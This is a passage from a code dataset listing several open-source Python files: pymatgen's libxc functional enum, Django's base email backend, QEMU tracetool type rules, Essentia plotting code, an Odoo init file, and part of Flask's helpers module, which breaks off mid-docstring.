repo_name (stringlengths 6-100) | path (stringlengths 4-294) | copies (stringlengths 1-5) | size (stringlengths 4-6) | content (stringlengths 606-896k) | license (stringclasses, 15 values)
---|---|---|---|---|---|
gVallverdu/pymatgen | pymatgen/core/libxcfunc.py | 4 | 13158 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Enumerator with the libxc identifiers.
This is a low-level object; client code should not interact with LibxcFunc directly
but should use the API provided by the Xcfunc object defined in core/xcfunc.py.
Part of this module is automatically generated, so be careful when refactoring.
Use the script ~pymatgen/dev_scripts/regen_libxcfunc.py to regenerate the enum values.
"""
import json
import os
from io import open
from enum import Enum
from monty.json import MontyEncoder
# The libxc version used to generate this file!
libxc_version = "3.0.0"
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2016, The Materials Project"
__version__ = libxc_version
__maintainer__ = "Matteo Giantomassi"
__email__ = "[email protected]"
__status__ = "Production"
__date__ = "May 16, 2016"
# Loads libxc info from json file
with open(os.path.join(os.path.dirname(__file__), "libxc_docs.json"),
"rt") as fh:
_all_xcfuncs = {int(k): v for k, v in json.load(fh).items()}
# @unique
class LibxcFunc(Enum):
"""
Enumerator with the identifiers. This object is used by Xcfunc
declared in xcfunc.py to create an internal representation of the XC functional.
This is a low-level object; client code should not interact with LibxcFunc directly
but should use the API provided by Xcfunc.
"""
# begin_include_dont_touch
LDA_C_1D_CSC = 18
LDA_C_1D_LOOS = 26
LDA_C_2D_AMGB = 15
LDA_C_2D_PRM = 16
LDA_C_GOMBAS = 24
LDA_C_HL = 4
LDA_C_GL = 5
LDA_C_vBH = 17
LDA_C_ML1 = 22
LDA_C_ML2 = 23
LDA_C_PW = 12
LDA_C_PW_MOD = 13
LDA_C_OB_PW = 14
LDA_C_PW_RPA = 25
LDA_C_PZ = 9
LDA_C_PZ_MOD = 10
LDA_C_OB_PZ = 11
LDA_C_RC04 = 27
LDA_C_RPA = 3
LDA_C_VWN = 7
LDA_C_VWN_1 = 28
LDA_C_VWN_2 = 29
LDA_C_VWN_3 = 30
LDA_C_VWN_4 = 31
LDA_C_VWN_RPA = 8
LDA_C_WIGNER = 2
LDA_K_TF = 50
LDA_K_LP = 51
LDA_X = 1
LDA_C_XALPHA = 6
LDA_X_1D = 21
LDA_X_2D = 19
LDA_XC_KSDT = 259
LDA_XC_TETER93 = 20
LDA_XC_ZLP = 43
GGA_C_AM05 = 135
GGA_C_FT97 = 88
GGA_C_LM = 137
GGA_C_LYP = 131
GGA_C_OP_B88 = 87
GGA_C_OP_PBE = 86
GGA_C_OP_G96 = 85
GGA_C_OP_PW91 = 262
GGA_C_OP_XALPHA = 84
GGA_C_OPTC = 200
GGA_C_P86 = 132
GGA_C_PBE = 130
GGA_C_PBE_SOL = 133
GGA_C_XPBE = 136
GGA_C_PBE_JRGX = 138
GGA_C_RGE2 = 143
GGA_C_APBE = 186
GGA_C_SPBE = 89
GGA_C_REGTPSS = 83
GGA_C_ZPBESOL = 63
GGA_C_PBEINT = 62
GGA_C_ZPBEINT = 61
GGA_C_PBELOC = 246
GGA_C_BGCP = 39
GGA_C_PBEFE = 258
GGA_C_PW91 = 134
GGA_C_Q2D = 47
GGA_C_SOGGA11 = 152
GGA_C_SOGGA11_X = 159
GGA_C_TCA = 100
GGA_C_REVTCA = 99
GGA_C_WI0 = 153
GGA_C_WI = 148
GGA_C_WL = 147
GGA_K_DK = 516
GGA_K_PERDEW = 517
GGA_K_VSK = 518
GGA_K_VJKS = 519
GGA_K_ERNZERHOF = 520
GGA_K_MEYER = 57
GGA_K_OL1 = 512
GGA_X_OL2 = 183
GGA_K_OL2 = 513
GGA_K_PEARSON = 511
GGA_K_TFVW = 52
GGA_K_VW = 500
GGA_K_GE2 = 501
GGA_K_GOLDEN = 502
GGA_K_YT65 = 503
GGA_K_BALTIN = 504
GGA_K_LIEB = 505
GGA_K_ABSP1 = 506
GGA_K_ABSP2 = 507
GGA_K_GR = 508
GGA_K_LUDENA = 509
GGA_K_GP85 = 510
GGA_X_2D_B86 = 128
GGA_X_2D_B86_MGC = 124
GGA_X_2D_B88 = 127
GGA_X_2D_PBE = 129
GGA_X_AIRY = 192
GGA_X_LAG = 193
GGA_X_AK13 = 56
GGA_X_AM05 = 120
GGA_X_B86 = 103
GGA_X_B86_MGC = 105
GGA_X_B86_R = 41
GGA_X_B88 = 106
GGA_X_OPTB88_VDW = 139
GGA_X_MB88 = 149
GGA_K_LLP = 522
GGA_K_FR_B88 = 514
GGA_K_THAKKAR = 523
GGA_X_BAYESIAN = 125
GGA_X_BPCCAC = 98
GGA_X_C09X = 158
GGA_X_CAP = 270
GGA_X_DK87_R1 = 111
GGA_X_DK87_R2 = 112
GGA_X_EV93 = 35
GGA_X_FT97_A = 114
GGA_X_FT97_B = 115
GGA_X_G96 = 107
GGA_X_HCTH_A = 34
GGA_X_HERMAN = 104
GGA_X_HJS_PBE = 525
GGA_X_HJS_PBE_SOL = 526
GGA_X_HJS_B88 = 527
GGA_X_HJS_B97X = 528
GGA_X_HJS_B88_V2 = 46
GGA_X_HTBS = 191
GGA_X_ITYH = 529
GGA_X_KT1 = 145
GGA_XC_KT2 = 146
GGA_X_LB = 160
GGA_X_LBM = 182
GGA_X_LG93 = 113
GGA_X_LV_RPW86 = 58
GGA_X_MPBE = 122
GGA_X_N12 = 82
GGA_X_GAM = 32
GGA_X_OPTX = 110
GGA_X_PBE = 101
GGA_X_PBE_R = 102
GGA_X_PBE_SOL = 116
GGA_X_XPBE = 123
GGA_X_PBE_JSJR = 126
GGA_X_PBEK1_VDW = 140
GGA_X_RGE2 = 142
GGA_X_APBE = 184
GGA_X_PBEINT = 60
GGA_X_PBE_TCA = 59
GGA_X_LAMBDA_LO_N = 45
GGA_X_LAMBDA_CH_N = 44
GGA_X_LAMBDA_OC2_N = 40
GGA_X_PBE_MOL = 49
GGA_X_BGCP = 38
GGA_X_PBEFE = 265
GGA_K_APBE = 185
GGA_K_REVAPBE = 55
GGA_K_TW1 = 187
GGA_K_TW2 = 188
GGA_K_TW3 = 189
GGA_K_TW4 = 190
GGA_K_APBEINT = 54
GGA_K_REVAPBEINT = 53
GGA_X_PBEA = 121
GGA_X_PW86 = 108
GGA_X_RPW86 = 144
GGA_K_FR_PW86 = 515
GGA_X_PW91 = 109
GGA_X_MPW91 = 119
GGA_K_LC94 = 521
GGA_X_Q2D = 48
GGA_X_RPBE = 117
GGA_X_SFAT = 530
GGA_X_SOGGA11 = 151
GGA_X_SSB_SW = 90
GGA_X_SSB = 91
GGA_X_SSB_D = 92
GGA_X_VMT_PBE = 71
GGA_X_VMT_GE = 70
GGA_X_VMT84_PBE = 69
GGA_X_VMT84_GE = 68
GGA_X_WC = 118
GGA_X_WPBEH = 524
GGA_XC_XLYP = 166
GGA_XC_PBE1W = 173
GGA_XC_MPWLYP1W = 174
GGA_XC_PBELYP1W = 175
GGA_XC_B97_D = 170
GGA_XC_HCTH_93 = 161
GGA_XC_HCTH_120 = 162
GGA_XC_HCTH_147 = 163
GGA_XC_HCTH_407 = 164
GGA_C_HCTH_A = 97
GGA_XC_B97_GGA1 = 96
GGA_XC_HCTH_P14 = 95
GGA_XC_HCTH_P76 = 94
GGA_XC_HCTH_407P = 93
GGA_C_N12 = 80
GGA_C_N12_SX = 79
GGA_C_GAM = 33
GGA_XC_EDF1 = 165
GGA_X_OPTPBE_VDW = 141
GGA_XC_MOHLYP = 194
GGA_XC_MOHLYP2 = 195
GGA_X_SOGGA = 150
GGA_XC_OBLYP_D = 67
GGA_XC_OPWLYP_D = 66
GGA_XC_OPBE_D = 65
GGA_XC_TH_FL = 196
GGA_XC_TH_FC = 197
GGA_XC_TH_FCFO = 198
GGA_XC_TH_FCO = 199
GGA_XC_TH1 = 154
GGA_XC_TH2 = 155
GGA_XC_TH3 = 156
GGA_XC_TH4 = 157
GGA_XC_VV10 = 255
HYB_GGA_XC_CAP0 = 477
HYB_GGA_X_N12_SX = 81
HYB_GGA_X_SOGGA11_X = 426
HYB_GGA_XC_B97 = 407
HYB_GGA_XC_B97_1 = 408
HYB_GGA_XC_B97_2 = 410
HYB_GGA_XC_B97_K = 413
HYB_GGA_XC_B97_3 = 414
HYB_GGA_XC_SB98_1a = 420
HYB_GGA_XC_SB98_1b = 421
HYB_GGA_XC_SB98_1c = 422
HYB_GGA_XC_SB98_2a = 423
HYB_GGA_XC_SB98_2b = 424
HYB_GGA_XC_SB98_2c = 425
HYB_GGA_XC_WB97 = 463
HYB_GGA_XC_WB97X = 464
HYB_GGA_XC_WB97X_V = 466
HYB_GGA_XC_WB97X_D = 471
HYB_GGA_XC_B97_1p = 266
HYB_GGA_XC_LC_VV10 = 469
HYB_GGA_XC_B1WC = 412
HYB_GGA_XC_B1LYP = 416
HYB_GGA_XC_B1PW91 = 417
HYB_GGA_XC_mPW1PW = 418
HYB_GGA_XC_mPW1K = 405
HYB_GGA_XC_BHANDH = 435
HYB_GGA_XC_BHANDHLYP = 436
HYB_GGA_XC_MPWLYP1M = 453
HYB_GGA_XC_B3PW91 = 401
HYB_GGA_XC_B3LYP = 402
HYB_GGA_XC_B3LYP5 = 475
HYB_GGA_XC_B3P86 = 403
HYB_GGA_XC_MPW3PW = 415
HYB_GGA_XC_MPW3LYP = 419
HYB_GGA_XC_MB3LYP_RC04 = 437
HYB_GGA_XC_REVB3LYP = 454
HYB_GGA_XC_B3LYPs = 459
HYB_GGA_XC_CAM_B3LYP = 433
HYB_GGA_XC_TUNED_CAM_B3LYP = 434
HYB_GGA_XC_CAMY_B3LYP = 470
HYB_GGA_XC_CAMY_BLYP = 455
HYB_GGA_XC_EDF2 = 476
HYB_GGA_XC_HSE03 = 427
HYB_GGA_XC_HSE06 = 428
HYB_GGA_XC_LRC_WPBEH = 465
HYB_GGA_XC_LRC_WPBE = 473
HYB_GGA_XC_HJS_PBE = 429
HYB_GGA_XC_HJS_PBE_SOL = 430
HYB_GGA_XC_HJS_B88 = 431
HYB_GGA_XC_HJS_B97X = 432
HYB_GGA_XC_LCY_BLYP = 468
HYB_GGA_XC_LCY_PBE = 467
HYB_GGA_XC_O3LYP = 404
HYB_GGA_XC_X3LYP = 411
HYB_GGA_XC_PBEH = 406
HYB_GGA_XC_PBE0_13 = 456
HYB_GGA_XC_HPBEINT = 472
MGGA_XC_TPSSLYP1W = 242
MGGA_C_BC95 = 240
MGGA_C_CC06 = 229
MGGA_C_CS = 72
MGGA_C_M08_HX = 78
MGGA_C_M08_SO = 77
MGGA_C_M11 = 76
MGGA_C_M11_L = 75
MGGA_C_MN12_L = 74
MGGA_C_MN12_SX = 73
MGGA_C_MN15_L = 261
MGGA_C_MN15 = 269
MGGA_C_PKZB = 239
MGGA_C_TPSS = 231
MGGA_C_REVTPSS = 241
MGGA_C_TPSSLOC = 247
MGGA_C_SCAN = 267
MGGA_C_M05 = 237
MGGA_C_M05_2X = 238
MGGA_C_VSXC = 232
MGGA_C_M06_L = 233
MGGA_C_M06_HF = 234
MGGA_C_M06 = 235
MGGA_C_M06_2X = 236
MGGA_C_DLDF = 37
MGGA_X_2D_PRHG07 = 210
MGGA_X_2D_PRHG07_PRP10 = 211
MGGA_X_BR89 = 206
MGGA_X_BJ06 = 207
MGGA_X_TB09 = 208
MGGA_X_RPP09 = 209
MGGA_X_GVT4 = 204
MGGA_X_LTA = 201
MGGA_X_M05 = 214
MGGA_X_M05_2X = 215
MGGA_X_M06_2X = 218
MGGA_X_M06_L = 203
MGGA_X_M06_HF = 216
MGGA_X_M06 = 217
MGGA_X_M08_HX = 219
MGGA_X_M08_SO = 220
MGGA_X_M11 = 225
MGGA_X_M11_L = 226
MGGA_X_MBEEF = 249
MGGA_X_MBEEFVDW = 250
MGGA_X_MK00 = 230
MGGA_X_MK00B = 243
MGGA_X_MN12_L = 227
MGGA_X_MN15_L = 260
MGGA_X_MS0 = 221
MGGA_X_MS1 = 222
MGGA_X_MS2 = 223
MGGA_X_MVS = 257
MGGA_X_PKZB = 213
MGGA_X_SCAN = 263
MGGA_X_TAU_HCTH = 205
MGGA_X_TPSS = 202
MGGA_X_MODTPSS = 245
MGGA_X_REVTPSS = 212
MGGA_X_BLOC = 244
MGGA_XC_B97M_V = 254
MGGA_XC_OTPSS_D = 64
MGGA_XC_ZLP = 42
HYB_MGGA_X_MVSH = 474
HYB_MGGA_XC_M05 = 438
HYB_MGGA_XC_M05_2X = 439
HYB_MGGA_XC_B88B95 = 440
HYB_MGGA_XC_B86B95 = 441
HYB_MGGA_XC_PW86B95 = 442
HYB_MGGA_XC_BB1K = 443
HYB_MGGA_XC_MPW1B95 = 445
HYB_MGGA_XC_MPWB1K = 446
HYB_MGGA_XC_X1B95 = 447
HYB_MGGA_XC_XB1K = 448
HYB_MGGA_XC_M06_HF = 444
HYB_MGGA_XC_M06 = 449
HYB_MGGA_XC_M06_2X = 450
HYB_MGGA_XC_PW6B95 = 451
HYB_MGGA_XC_PWB6K = 452
HYB_MGGA_XC_TPSSH = 457
HYB_MGGA_XC_REVTPSSH = 458
HYB_MGGA_X_DLDF = 36
HYB_MGGA_XC_M08_HX = 460
HYB_MGGA_XC_M08_SO = 461
HYB_MGGA_XC_M11 = 462
HYB_MGGA_X_MN12_SX = 248
HYB_MGGA_X_MN15 = 268
HYB_MGGA_X_MS2H = 224
HYB_MGGA_X_SCAN0 = 264
HYB_MGGA_XC_WB97M_V = 531
# end_include_dont_touch
def __init__(self, num):
"""
Init.
:param num: Integer identifier assigned by libxc to the functional.
"""
info = _all_xcfuncs[self.value]
self.kind = info["Kind"]
self.family = info["Family"]
def __str__(self):
return "name=%s, kind=%s, family=%s" % (
self.name, self.kind, self.family)
@staticmethod
def all_families():
"""
List of strings with the libxc families.
Note that the XC_FAMILY prefix is removed from the string, e.g. XC_FAMILY_LDA becomes LDA.
"""
return sorted(set(d["Family"] for d in _all_xcfuncs.values()))
@staticmethod
def all_kinds():
"""
List of strings with the libxc kinds.
Also in this case, the string is obtained by removing the XC_ prefix, e.g.
XC_CORRELATION --> CORRELATION
"""
return sorted(set(d["Kind"] for d in _all_xcfuncs.values()))
@property
def info_dict(self):
"""Dictionary with metadata. see libxc_docs.json"""
return _all_xcfuncs[self.value]
@property
def is_x_kind(self):
"""True if this is an exchange-only functional"""
return self.kind == "EXCHANGE"
@property
def is_c_kind(self):
"""True if this is a correlation-only functional"""
return self.kind == "CORRELATION"
@property
def is_k_kind(self):
"""True if this is a kinetic functional"""
return self.kind == "KINETIC"
@property
def is_xc_kind(self):
"""True if this is a exchange+correlation functional"""
return self.kind == "EXCHANGE_CORRELATION"
@property
def is_lda_family(self):
"""True if this functional belongs to the LDA family."""
return self.family == "LDA"
@property
def is_gga_family(self):
"""True if this functional belongs to the GGA family."""
return self.family == "GGA"
@property
def is_mgga_family(self):
"""True if this functional belongs to the meta-GGA family."""
return self.family == "MGGA"
@property
def is_hyb_gga_family(self):
"""True if this functional belongs to the hybrid + GGA family."""
return self.family == "HYB_GGA"
@property
def is_hyb_mgga_family(self):
"""True if this functional belongs to the hybrid + meta-GGA family."""
return self.family == "HYB_MGGA"
def as_dict(self):
"""
Makes LibxcFunc obey the general json interface used in pymatgen for
easier serialization.
"""
return {"name": self.name,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
@staticmethod
def from_dict(d):
"""
Makes LibxcFunc obey the general json interface used in pymatgen for
easier serialization.
"""
return LibxcFunc[d["name"]]
def to_json(self):
"""
Returns a json string representation of the MSONable object.
"""
return json.dumps(self.as_dict(), cls=MontyEncoder)
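# Example usage (an illustrative sketch, not part of the generated module;
# it assumes the "Kind"/"Family" strings checked by the properties above):
#
#     xc = LibxcFunc.GGA_X_PBE
#     assert xc.is_x_kind and xc.is_gga_family
#     d = xc.as_dict()                      # MSONable dict round-trip
#     assert LibxcFunc.from_dict(d) is xc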
if __name__ == "__main__":
for xc in LibxcFunc:
print(xc)
| mit |
pigeonflight/strider-plone | docker/appengine/lib/django-1.2/django/core/mail/backends/base.py | 660 | 1164 |
"""Base email backend class."""
class BaseEmailBackend(object):
"""
Base class for email backend implementations.
Subclasses must at least override send_messages().
"""
def __init__(self, fail_silently=False, **kwargs):
self.fail_silently = fail_silently
def open(self):
"""Open a network connection.
This method can be overridden by backend implementations to
open a network connection.
It's up to the backend implementation to track the status of
a network connection if it's needed by the backend.
This method can be called by applications to force a single
network connection to be used when sending mails. See the
send_messages() method of the SMTP backend for a reference
implementation.
The default implementation does nothing.
"""
pass
def close(self):
"""Close a network connection."""
pass
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
raise NotImplementedError
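# Illustrative only (not part of Django): a minimal concrete backend sketch.
# It assumes each item in email_messages is an EmailMessage whose message()
# method returns a MIME object with as_string(), as the SMTP backend relies on.
class _ConsoleEmailBackend(BaseEmailBackend):
    def send_messages(self, email_messages):
        count = 0
        for message in email_messages:
            print(message.message().as_string())
            count += 1
        return count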
| mit |
Sajid3/orp | third-party/qemu-orp/scripts/tracetool/transform.py | 78 | 4238 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Type-transformation rules.
"""
__author__ = "Lluís Vilanova <[email protected]>"
__copyright__ = "Copyright 2012-2014, Lluís Vilanova <[email protected]>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "[email protected]"
def _transform_type(type_, trans):
if isinstance(trans, str):
return trans
elif isinstance(trans, dict):
if type_ in trans:
return _transform_type(type_, trans[type_])
elif None in trans:
return _transform_type(type_, trans[None])
else:
return type_
elif callable(trans):
return trans(type_)
else:
raise ValueError("Invalid type transformation rule: %s" % trans)
def transform_type(type_, *trans):
"""Return a new type transformed according to the given rules.
Applies each of the transformation rules in trans in order.
If an element of trans is a string, return it.
If an element of trans is a function, call it with type_ as its only
argument.
If an element of trans is a dict, search type_ in its keys. If type_ is
a key, use the value as a transformation rule for type_. Otherwise, if
None is a key use the value as a transformation rule for type_.
Otherwise, return type_.
Parameters
----------
type_ : str
Type to transform.
trans : list of function or dict
Type transformation rules.
"""
if len(trans) == 0:
raise ValueError
res = type_
for t in trans:
res = _transform_type(res, t)
return res
##################################################
# tcg -> host
def _tcg_2_host(type_):
if type_ == "TCGv":
# force a fixed-size type (target-independent)
return "uint64_t"
else:
return type_
TCG_2_HOST = {
"TCGv_i32": "uint32_t",
"TCGv_i64": "uint64_t",
"TCGv_ptr": "void *",
None: _tcg_2_host,
}
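# Illustrative: applying the tcg -> host rules above with transform_type.
#
#     transform_type("TCGv_i32", TCG_2_HOST)  # -> "uint32_t"
#     transform_type("TCGv", TCG_2_HOST)      # -> "uint64_t" (via the None fallback _tcg_2_host)
#     transform_type("int", TCG_2_HOST)       # -> "int" (no rule matches)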
##################################################
# host -> host compatible with tcg sizes
HOST_2_TCG_COMPAT = {
"uint8_t": "uint32_t",
}
##################################################
# host/tcg -> tcg
def _host_2_tcg(type_):
if type_.startswith("TCGv"):
return type_
raise ValueError("Don't know how to translate '%s' into a TCG type\n" % type_)
HOST_2_TCG = {
"uint32_t": "TCGv_i32",
"uint64_t": "TCGv_i64",
"void *" : "TCGv_ptr",
None: _host_2_tcg,
}
##################################################
# tcg -> tcg helper definition
def _tcg_2_helper_def(type_):
if type_ == "TCGv":
return "target_ulong"
else:
return type_
TCG_2_TCG_HELPER_DEF = {
"TCGv_i32": "uint32_t",
"TCGv_i64": "uint64_t",
"TCGv_ptr": "void *",
None: _tcg_2_helper_def,
}
##################################################
# tcg -> tcg helper declaration
def _tcg_2_tcg_helper_decl_error(type_):
raise ValueError("Don't know how to translate type '%s' into a TCG helper declaration type\n" % type_)
TCG_2_TCG_HELPER_DECL = {
"TCGv" : "tl",
"TCGv_ptr": "ptr",
"TCGv_i32": "i32",
"TCGv_i64": "i64",
None: _tcg_2_tcg_helper_decl_error,
}
##################################################
# host/tcg -> tcg temporary constant allocation
def _host_2_tcg_tmp_new(type_):
if type_.startswith("TCGv"):
return "tcg_temp_new_nop"
raise ValueError("Don't know how to translate type '%s' into a TCG temporal allocation" % type_)
HOST_2_TCG_TMP_NEW = {
"uint32_t": "tcg_const_i32",
"uint64_t": "tcg_const_i64",
"void *" : "tcg_const_ptr",
None: _host_2_tcg_tmp_new,
}
##################################################
# host/tcg -> tcg temporary constant deallocation
def _host_2_tcg_tmp_free(type_):
if type_.startswith("TCGv"):
return "tcg_temp_free_nop"
raise ValueError("Don't know how to translate type '%s' into a TCG temporal deallocation" % type_)
HOST_2_TCG_TMP_FREE = {
"uint32_t": "tcg_temp_free_i32",
"uint64_t": "tcg_temp_free_i64",
"void *" : "tcg_temp_free_ptr",
None: _host_2_tcg_tmp_free,
}
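# Illustrative: rules compose left to right, so a host type can first be
# widened to a TCG-compatible size and then mapped to a TCG type:
#
#     transform_type("uint8_t", HOST_2_TCG_COMPAT, HOST_2_TCG)  # -> "TCGv_i32"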
| apache-2.0 |
sankalpg/Essentia_tonicDebug_TEMP | src/python/essentia/plotting.py | 6 | 4133 |
# Copyright (C) 2006-2013 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
import os
import pylab
import math
def descriptorPlot(name, xData, yData, pool, options):
pylab.figure()
pylab.title(name)
pylab.plot(xData, yData)
duration = int(math.floor(pool.value('metadata.duration_processed')))
maxValue = max(yData)
minValue = min(yData)
# plotting segments lines
if options['segmentation']['doSegmentation']:
segments = pool.value('segmentation.timestamps')
for segment in segments:
pylab.plot([segment[0], segment[0]], [minValue, maxValue], 'r-')
pylab.plot([segment[1], segment[1]], [minValue, maxValue], 'r-')
pylab.axis([-2, duration + 2, minValue, maxValue])
if not os.path.exists('plots'):
os.mkdir('plots')
figureName = 'plots/' + name + '.png'
print 'Plotting ' + name + '...'
pylab.savefig(figureName)
return figureName
def descriptorPlotHTML(namespace, name, audio, pool, options):
try:
# plot name
descName = namespace + '.' + name
# plot x data
scopes = pool.value(namespace + '.' + name + '.' + 'scope')
descScopes = []
for scope in scopes:
descScopes.append(scope[0])
# plot y data
descValues = pool.value(namespace + '.' + name)
# plotting
try:
figureName = descriptorPlot(descName, descScopes, descValues, pool, options)
htmlCode = '<img src ="' + figureName + '"/>'
except RuntimeError:
# special case: descriptors with more than one dimension (mfcc, barkbands, etc...)
htmlCode = ''
for i in range(len(descValues[0])):
descSubName = descName + '.' + str(i)
descSubValues = []
for value in descValues:
descSubValues.append(value[i])
figureName = descriptorPlot(descSubName, descScopes, descSubValues, pool, options)
htmlCode += '<img src ="' + figureName + '"/>'
except KeyError:
htmlCode = ''
print "WARNING: the descriptor", descName, "doesn't exist"
return htmlCode
def namespace_comp(ns1, ns2):
if ns1 == 'special': return -1
if ns2 == 'special': return 1
return cmp(ns1, ns2)
def compute(inputFilename, audio, pool, options):
htmlCode = '<p align="center"><b><font size=6>' + inputFilename + '</font></b></p>'
html = False
descriptors = options['plotsList']
namespaces = [ ns for ns in descriptors ]
namespaces.sort(namespace_comp)
# plot signal
descName = "signal"
descValues = audio
descScopes = []
for time in range(len(audio)):
descScopes.append(time / options['sampleRate'])
figureName = descriptorPlot(descName, descScopes, descValues, pool, options)
htmlCode += '<img src ="' + figureName + '"/>'
# plot descriptors, one by one
for namespace in namespaces:
names = [ n for n in descriptors[namespace] ]
names.sort()
for name in names:
htmlCode += descriptorPlotHTML(namespace, name, audio, pool, options)
# write HTML file
htmlFile = open(inputFilename + '.html', 'w')
htmlFile.write(htmlCode)
htmlFile.close()
| agpl-3.0 |
MarcosCommunity/odoo | addons/l10n_pa/__init__.py | 2120 | 1456 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2011 Cubic ERP - Teradata SAC. (http://cubicerp.com).
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs.
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company.
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
tfrdidi/PhiDi | libs/flask/helpers.py | 776 | 33793 |
# -*- coding: utf-8 -*-
"""
flask.helpers
~~~~~~~~~~~~~
Implements various helpers.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
import pkgutil
import posixpath
import mimetypes
from time import time
from zlib import adler32
from threading import RLock
from werkzeug.routing import BuildError
from functools import update_wrapper
try:
from werkzeug.urls import url_quote
except ImportError:
from urlparse import quote as url_quote
from werkzeug.datastructures import Headers
from werkzeug.exceptions import NotFound
# this was moved in 0.7
try:
from werkzeug.wsgi import wrap_file
except ImportError:
from werkzeug.utils import wrap_file
from jinja2 import FileSystemLoader
from .signals import message_flashed
from .globals import session, _request_ctx_stack, _app_ctx_stack, \
current_app, request
from ._compat import string_types, text_type
# sentinel
_missing = object()
# what separators does this operating system provide that are not a slash?
# this is used by the send_from_directory function to ensure that nobody is
# able to access files from outside the filesystem.
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
def _endpoint_from_view_func(view_func):
"""Internal helper that returns the default endpoint for a given
function. This always is the function name.
"""
assert view_func is not None, 'expected view func if endpoint ' \
'is not provided.'
return view_func.__name__
def stream_with_context(generator_or_function):
"""Request contexts disappear when the response is started on the server.
This is done for efficiency reasons and to make it less likely to encounter
memory leaks with badly written WSGI middlewares. The downside is that if
you are using streamed responses, the generator cannot access request bound
information any more.
This function however can help you keep the context around for longer::
from flask import stream_with_context, request, Response
@app.route('/stream')
def streamed_response():
@stream_with_context
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(generate())
Alternatively it can also be used around a specific generator::
from flask import stream_with_context, request, Response
@app.route('/stream')
def streamed_response():
def generate():
yield 'Hello '
yield request.args['name']
yield '!'
return Response(stream_with_context(generate()))
.. versionadded:: 0.9
"""
try:
gen = iter(generator_or_function)
except TypeError:
def decorator(*args, **kwargs):
gen = generator_or_function()
return stream_with_context(gen)
return update_wrapper(decorator, generator_or_function)
def generator():
ctx = _request_ctx_stack.top
if ctx is None:
raise RuntimeError('Attempted to stream with context but '
'there was no context in the first place to keep around.')
with ctx:
# Dummy sentinel. Has to be inside the context block or we're
# not actually keeping the context around.
yield None
# The try/finally is here so that if someone passes a WSGI level
# iterator in we're still running the cleanup logic. Generators
# don't need that because they are closed on their destruction
# automatically.
try:
for item in gen:
yield item
finally:
if hasattr(gen, 'close'):
gen.close()
# The trick is to start the generator. Then the code execution runs until
# the first dummy None is yielded at which point the context was already
# pushed. This item is discarded. Then when the iteration continues the
# real generator is executed.
wrapped_g = generator()
next(wrapped_g)
return wrapped_g
def make_response(*args):
"""Sometimes it is necessary to set additional headers in a view. Because
views do not have to return response objects but can return a value that
is converted into a response object by Flask itself, it becomes tricky to
add headers to it. This function can be called instead of using a return
and you will get a response object which you can use to attach headers.
If view looked like this and you want to add a new header::
def index():
return render_template('index.html', foo=42)
You can now do something like this::
def index():
response = make_response(render_template('index.html', foo=42))
response.headers['X-Parachutes'] = 'parachutes are cool'
return response
This function accepts the very same arguments you can return from a
view function. This for example creates a response with a 404 error
code::
response = make_response(render_template('not_found.html'), 404)
The other use case of this function is to force the return value of a
view function into a response which is helpful with view
decorators::
response = make_response(view_function())
response.headers['X-Parachutes'] = 'parachutes are cool'
Internally this function does the following things:
- if no arguments are passed, it creates a new response argument
- if one argument is passed, :meth:`flask.Flask.make_response`
is invoked with it.
- if more than one argument is passed, the arguments are passed
to the :meth:`flask.Flask.make_response` function as tuple.
.. versionadded:: 0.6
"""
if not args:
return current_app.response_class()
if len(args) == 1:
args = args[0]
return current_app.make_response(args)
def url_for(endpoint, **values):
"""Generates a URL to the given endpoint with the method provided.
Variable arguments that are unknown to the target endpoint are appended
to the generated URL as query arguments. If the value of a query argument
is `None`, the whole pair is skipped. In case blueprints are active
you can shortcut references to the same blueprint by prefixing the
local endpoint with a dot (``.``).
This will reference the index function local to the current blueprint::
url_for('.index')
For more information, head over to the :ref:`Quickstart <url-building>`.
To integrate applications, :class:`Flask` has a hook to intercept URL build
errors through :attr:`Flask.build_error_handler`. The `url_for` function
results in a :exc:`~werkzeug.routing.BuildError` when the current app does
not have a URL for the given endpoint and values. When it does, the
:data:`~flask.current_app` calls its :attr:`~Flask.build_error_handler` if
it is not `None`, which can return a string to use as the result of
`url_for` (instead of `url_for`'s default to raise the
:exc:`~werkzeug.routing.BuildError` exception) or re-raise the exception.
An example::
def external_url_handler(error, endpoint, **values):
"Looks up an external URL when `url_for` cannot build a URL."
# This is an example of hooking the build_error_handler.
# Here, lookup_url is some utility function you've built
# which looks up the endpoint in some external URL registry.
url = lookup_url(endpoint, **values)
if url is None:
# External lookup did not have a URL.
